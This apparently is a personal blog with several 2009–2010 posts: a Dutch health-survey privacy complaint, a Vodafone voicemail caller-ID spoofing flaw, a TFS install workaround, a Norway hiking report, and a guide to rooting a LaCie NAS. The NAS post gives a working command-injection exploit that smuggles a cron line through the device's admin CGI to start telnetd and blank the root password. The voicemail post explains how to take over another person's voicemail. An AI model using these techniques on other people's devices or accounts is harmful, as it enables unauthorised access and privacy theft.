Dutch GGD claims survey to be anonymous, but it’s not

Posted on 2010-05-30 by Jeroen

The Dutch healthcare organisation (GGD) is an organisation funded by the Dutch government that is concerned with the health of people in the Netherlands. They want to know about the health of people in the province of Gelderland, so they decided to start a survey.
I agree, statistics, like from the Dutch statistics bureau need to come from somewhere, and in this case it is important they get it from a very diverse an relatively large population.

How it works
So how does the GGD do that? Well, they first they send you a letter with login data. You can login on their website (not using SSL!) using a predefined code and you are ready to fill in the survey. And to be certain you didn’t forget, they send you the survey on paper, so people with no access or know how of the Internet can complete the survey as well.

Sensitive information
The questions they ask you are about your birth year, marital status, education, health, alcohol use, smoking, drug use, eating habits, social environment, violence at home and your work. A lot of sensitive information, some of which you probably don’t even voluntarily tell to your doctor, unless absolutely necessary.

Anonymity
Of course, you don’t have to be afraid that the data you fill in is connected to you as a person, because they offer you to conduct the survey anonymously. So, the GGD offers you a way to keep your privacy. They intent to do this by allowing you to rip off the first paper of the survey before sending it to them. Well ok, I ripp off the first page and my privacy is guaranteed. But then I started wondering what all the the bar codes and identification numbers are doing on each of the pages? (take a look at the first survey page snapshot below)

Anonymous or not anonymous, that’s the question
The thing that really scares me about this survey is the fact that they lie to the participants. This is not an anonymous survey, at least not to my definition of “anonymous”.
They GGD even mistakenly proofs to you that their survey is not really anonymous. How? Because they recently sent me a letter asking why I didn’t fill in the survey. Err wait, I could have submitted it to them anonymously (remember), so how could they possibly know I didn’t sent it to them or filled it in online already..? That’s the point. If it was really anonymous, they shouldn’t have known whether I sent them the survey!

My opinion
I think the GGD screwed up. Not because their survey was bad, nor is their intention to conduct this survey, but solely because they claim that it is anonymous, which it is certainly not! If they ever want to gain my trust again, or even receive sensitive information about myself, they should define what they mean by “anonymous” and provide a proper and clear privacy policy. Lying is not a good base for gaining consumer trust.

References (the letters)

Posted in Privacy | Tagged , , , , , , | Leave a comment

Vodafone voicemail uses caller ID for authentication

Posted on 2010-05-30 by Jeroen

This article is about a security risk that I found while using Skype and Vodafone voicemail. In this article I will dive into a specific situation concerning the security of one’s Vodafone voicemail (Netherlands) in combination with Skype‘s ability to spoof the caller ID. Besides that I look at the main concern: trusting a caller ID for authentication purposes.

Vodafone voicemail and Skype

The problem is simple. Vodafone NL offers their customers a voicemail service. If you call the voicemail service from your own mobile phone, you get direct access to the voicemail inbox without needing any form of authorization. It seems the mobile’s caller ID is used for authentication.
Skype, on the other hand, has a ‘feature’ that allows you to assign your own mobile number as a caller ID for Skype-Out calls. This means you can spoof your caller ID, if you authorize it with Skype, for which you only need to respond to an SMS sent to the device once.

So, if I could trick a victim into lending me his/her mobile for only 5 minutes, I could abuse that moment to register the mobile number with a Skype account. This would allow me to access the victim’s Vodafone voicemail, because Skype allows you to spoof the number, and Vodafone authenticates you to a voicemail box based on the caller ID. So, I only need my Skype account to access the victim’s voicemail. An even simpler method could be by using a service provider that allows me to spoof a mobile number, like SpoofCard claims to do. You would then only require the victims mobile phone number. Scary!

Other services at risk?

So Vodafone voicemail (NL) is vulnerable for this “hack”. But what about other service providers that rely on the caller ID?

For example the ‘ABN AMRO Saldo voor de iPhone‘ [iTunes], a banking applications for the dutch ABN Amro bank that allows you to see your bank account’ balance (requires a 4-digit PIN).
Or what about the ‘Rabo Bankieren‘ [iTunes] used for banking with the dutch Rabobank that only requires a 5-digit PIN to see your bank account’ balance?
By circumventing the caller ID as being part of the authorization of these applications, the only security layer left is a 4 -or 5-digit PIN code, which IMHO is not enough any more.

Of course, the same principle applies to SMS text messages, like described in the article Twitter and Jott Vulnerable to SMS and Caller ID Spoofing by dhanjani.com, but for the sake of simplicity I will not go into that right now.

Questions and conclusion

So what do you think?

  • Do you think this is a security risk or not?
  • Is the caller ID something that is easy to fake?
  • Why is Skype allowed to spoof the caller ID? Is this something anyone can do on any phone network?
  • Should service providers be allowed to trust the caller ID for authentication purposes?
  • Have you seen service providers using the caller ID for authentication purposes?

In my opinion trusting the called id for authentication purposes imposed a security risk. Developers should be aware that trusting a caller ID should not be an authentication method solely by itself, but always as an addition to another. In my opinion, service providers should not use the caller ID alone for authentication!

And remember, if Paris Hilton can hack into a voicemail, anyone can! ;-)

Posted in Internet, Privacy | Tagged , , , , , , , , , , , | Leave a comment

‘cab3.cab has an invalid digital signature’ when installing Team Foundation Server 2010 beta2

Posted on 2009-10-21 by Jeroen

I just started installing Team Foundation Server 2010 beta 2 from an ISO file, using MagicDisc to mount it in my Windows 2007 running in Virtual PC, while i stumbled upon this error:

cab3.cab has an invalid digital signature

You can solve this error by explicitly trusting the certificate that the cab3.cab file was signed with, following these steps:

  1. Lookup up the file in explorer
  2. Go the file’ properties
  3. Go to the tab ‘Digital Signatures’
  4. Click the one item in the list en click ‘Details’
  5. Click ‘View Certificate’ in the openen window
  6. Install the certificate in the ‘Trusted Root Certificate Authorities’ store
  7. Re-run the setup, the cab3 exception should not occur any more

It complained about other cab files as well, but the installer would continue after just clicking ‘Ok’, otherwise you should repeat the steps for the other cab files as well.

Posted in .NET | Tagged | Leave a comment

Hiking in Norway’s Jotunheimen and Hardangervidda

Posted on 2009-08-31 by Jeroen
Besseggen

If you like hiking you should definitely go to Norway. I’ve been walking in Jotunheimen and the Hardangervidda with Martin in the last week of August 2009. The environment is truly beautiful and pure, though you should be prepared for the Scandinavian weather, even in summer time.

When hiking in Norway (and probably hiking in general), there is some advice that I can give you:

  • Make sure you follow this guide (English and German), provided by the Norwegian Trekking Association (DNT). It includes a nice packing list as well.
  • Good shoes are very important, especially in wet environments with slippery rocks and swamped area’s like the Hardangervidda.
  • Be well prepared for both sunny and bad weather (take suncream and clothes that protect you against cold and rain).
  • Always take a 1:50.000 map of the environment. You can buy those in shops and some of the larger huts in the area. Make sure it is protected against rain as well.
  • A GPS in addition to a map can be useful, especially when it contains Garmin’s topo map of Norway. These topo maps contain most of the trails that are also on the physical map.
  • Be sure to check if the huts you want to spend the night are opened (especially with staffed huts). Some of the huts we’ve been to would be closed at the first of September.

Jotunheimen (“The home of the giants”)

When you are at Jotunheimen you probably want to visit Besseggen, Norway’s most famous walking trail. We walked from Gjendesheim to Memurubu, but most people first take the boat from Gjendesheim to Memurubu and then walk back from Memurubu to Gjendesheim.

Walking the famous Peer-Gynt trail takes about 6 hours excluding time to rest and relax. Memurubu even has its own weather forecast, so be sure to check that out as well. The following images should give you an idea of the trail:

The route from Gjendesheim to Memurubu, including a height and speed profile should give you some more information about the route, that you can download below as well:

Elevation Profile
Download as GPX

Hardangervidda

The Hardangervidda is – compared to the Jotunheimen – flatter when it comes to height differences and has more swamped area’s. The west side of the Hardangervidda has the most height differences and is also the side we explored a little. It can be reached by car from Øvre Eidfjord (checkout the CAR waypoint below). It’s a steep small road going up a few hundred meters (passing a beautiful waterfall that is not considered that special because it is not on the 1:50000 map), ending with two parking places with close to each other with ( – when you are lucky -) some crazy sheep.

We intended to walk to hut Vivelid from our car. When we arrived at hut Vivelid we decided to walk on to hut Hedlo, because the people running hut Vivelid where quite unfriendly (sadly that happens). The people running the private hut Hedlo on the contrary were very friendly, with good food, but are also pretty expensive. The walk is certainly doable in a day, though the route avoiding the waterfall Valursfossen, which we took on our way back, is a little quicker.

Checkout some pictures:

This is the route from the car to Hedlo, passing the beautiful Valursfossen and then via Vivelid to Hedlo.

Elevation Profile
Download as GPX

‘I see Dutch people, they are everywhere’

Something else we learned is that people from the Netherlands seem to like visiting Norway. On the road from Øvre Eidfjord to the Hardangervidda, were we parked our car at the first parking place, there was room for around eight cars, of which six were taken by people from the Netherlands. Yeah, we have that a lot. :)

Posted in GPS links, Traveling | Tagged , , , , , , , , , | 2 Comments

Get a root shell on a Lacie Network Space device without physically opening the device

Posted on 2009-07-29 by Jeroen

About the NAS

LaCie Network Space

LaCie Network Space

I own a 1 TB Lacie Network Space device. This device, also called Network Attached Storage (NAS), enables you to hook it onto your (local) network and access files via file -and print sharing, ftp and other protocols. Very handy, if it works as you expect it to.
The NAS has an ARM926EJ-S processor, a 1TB hard disk, 16MB of memory, an USB port and no fan (which makes it pretty quiet).

Problem

My problem with the NAS is that the kernel running on the device starts killing processes when I copy very large (2 GB+) files to the NAS via file -and print-sharing (using the samba server). This broke my device in such a way that it would become unusable (no admin panel, though still pingable). Therefore I sent the device for RMA to Lacie’s service desk where it was repaired.
At least I thought it was, because after copying those large files again, the device broke again, but this time  I was luckily still able to reboot and keep the device up a little while before it required a new reboot. :|
The system log showed a kernel that was randomly killing processes. I expect this might be caused by the autoscan feature that indexes the media on the device, or maybe the device just doesn’t have enough memory to cope with the continuous transfer of big files. Not funny for a € 160,- device.

Getting root

I decided I didn’t want to submit the device for RMA again and wanted to get root access to the device and repair it (read: make it more stable) myself. However I didn’t want to physically open the device and void the warrant. Luckily you don’t have to, at least not when your device is running firmware 1.1.8, as I found out thanks to a post from user ‘hardel09′ (read here). You should only proceed when you understand what you are doing. If you do anything wrong, it can break your device.

Take the following steps:

  1. Save the content below to a HTML page, as it allows you to send commands that allow you to abuse cron for executing the tasks you want: 
    <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Hack the NAS</title>
</head>
<body>
<form name='edit_form' method='post' action='http://YOURDEVICE/cgi-bin/admin/media'>
<input type='hidden' id='autoscn' name='autoscn' value='true' />
<input type='hidden' id='modified' name='modified' value='true' />
<input name='hour' value='12'/><input name='minute' value='50 12 * * * chmod 755 /home/openshare/utelnetd; /home/openshare/utelnetd &'/>
<input type=submit value='SET CRONTAB'/>
</form></body>
</html>
  2. Change the YOURDEVICE in the HTML-file to use the right IP-address or hostname of the NAS
  3. Copy utelnetd to \\YOURDEVICE\openshare\utelnetd
  4. Open the HTML file with your favorite browser and fill the current hour in the hour input field and fill the minute input field with the value below. Change the “HOUR” string to the current hour and change the “MINUTE” string to the next minute plus 2 minutes or so (leaving existing spaces intact), assuming the time on your NAS is correctly set (if not, make it correct by using the admin panel). Now click the SET CRONTAB button and after a few seconds you should end up at the administrator media page with the autoscan checkbox selected. 
    MINUTE HOUR * * * chmod 755 /home/openshare/utelnetd;  /home/openshare/utelnetd &
  5. Now wait a few minutes, start you favorite network scanner tool and check if port 23 on the NAS has yet appeared as open. If this is not the case, try again from step 4.
  6. If so, you can almost log in, if you set a (empty) password for the root user. Get to the HTML page again, change the “MINUTE” and “HOUR” strings again (leaving existing spaces intact) and add a command that makes root’s password empty: 
    MINUTE HOUR * * * passwd -d root
  7. Login with user root via telnet to get your root shell:

    root shell

    root shell

  8. If you got a shell, congratulations, you did it! Now continue to make it permanent. Disable the cleanConf daemon, so your changes won’t be reversed when the NAS is rebooted: 
    cd /etc/rc.d/rc3.d
mkdir disabled
mv S12cleanConf disabled
  9. Fix the hacked crontab by executing the command below and clear the first line in the editor (which will disable autoscan) 
    crontab -e
  10. Copy /home/openshare/utelnetd to /usr/bin and make it executable: 
    cp /home/openshare/utelnetd /usr/bin
chmod 755 /usr/bin/utelnetd
  11. Add a script in /etc/init.d/telnetd for starting utelnetd automatically. Mine looks like this: 
    #!/bin/sh
# Begin $rc_base/init.d/telnetd
 
. /etc/sysconfig/rc
. $rc_functions
 
case "$1" in
        start)
                echo "Starting telnetd server..."
                /usr/bin/utelnetd &
                ;;
 
        stop)
                echo "Stopping telnetd server..."
 
                killall utelnetd
                ;;
        restart)
                $0 stop
                sleep 1
                $0 start
                ;;
 
        status)
                statusproc utelnetd
                ;;
 
        *)
                echo "Usage: $0 {start|stop|restart|status}"
                exit 1
                ;;
esac
 
# End $rc_base/init.d/telnetd
  12. Enable the script by making a symbolic link that points to the telnetd script: 
    cd /etc/rc.d/rc3.d
ln -s ../../init.d/telnetd S18telnetd
cd /etc/rc.d/rc6.d
ln -s ../../init.d/telnetd K12telnetd
  13. Make the script executable: 
    chmod +x /etc/init.d/telnetd

That’s it. You can now reboot the device and utelnetd is automatically started after the reboot.

Now we have root

So what can you do with the device now you have root access to it?

  • Secure it. Anyone in your network who can access the device via IP can currently connect to it without a password, so you might consider using openssh instead of telnet as described here. You might want to secure the /www/cgi-bin/admin/media script as well, as it can be easily used to hack into the device.
  • Fix other problems with the software on the NAS that bother you.
  • Mount (multiple) partitions from an external mass-storage device and make it available on the network.
  • Use it as bittorrent client.
  • Run other (light-weighted / self-compiled) applications on it.

I hope this has helped anyone in any way :)

Posted in Hardware, Linux | Tagged , , , , , | 60 Comments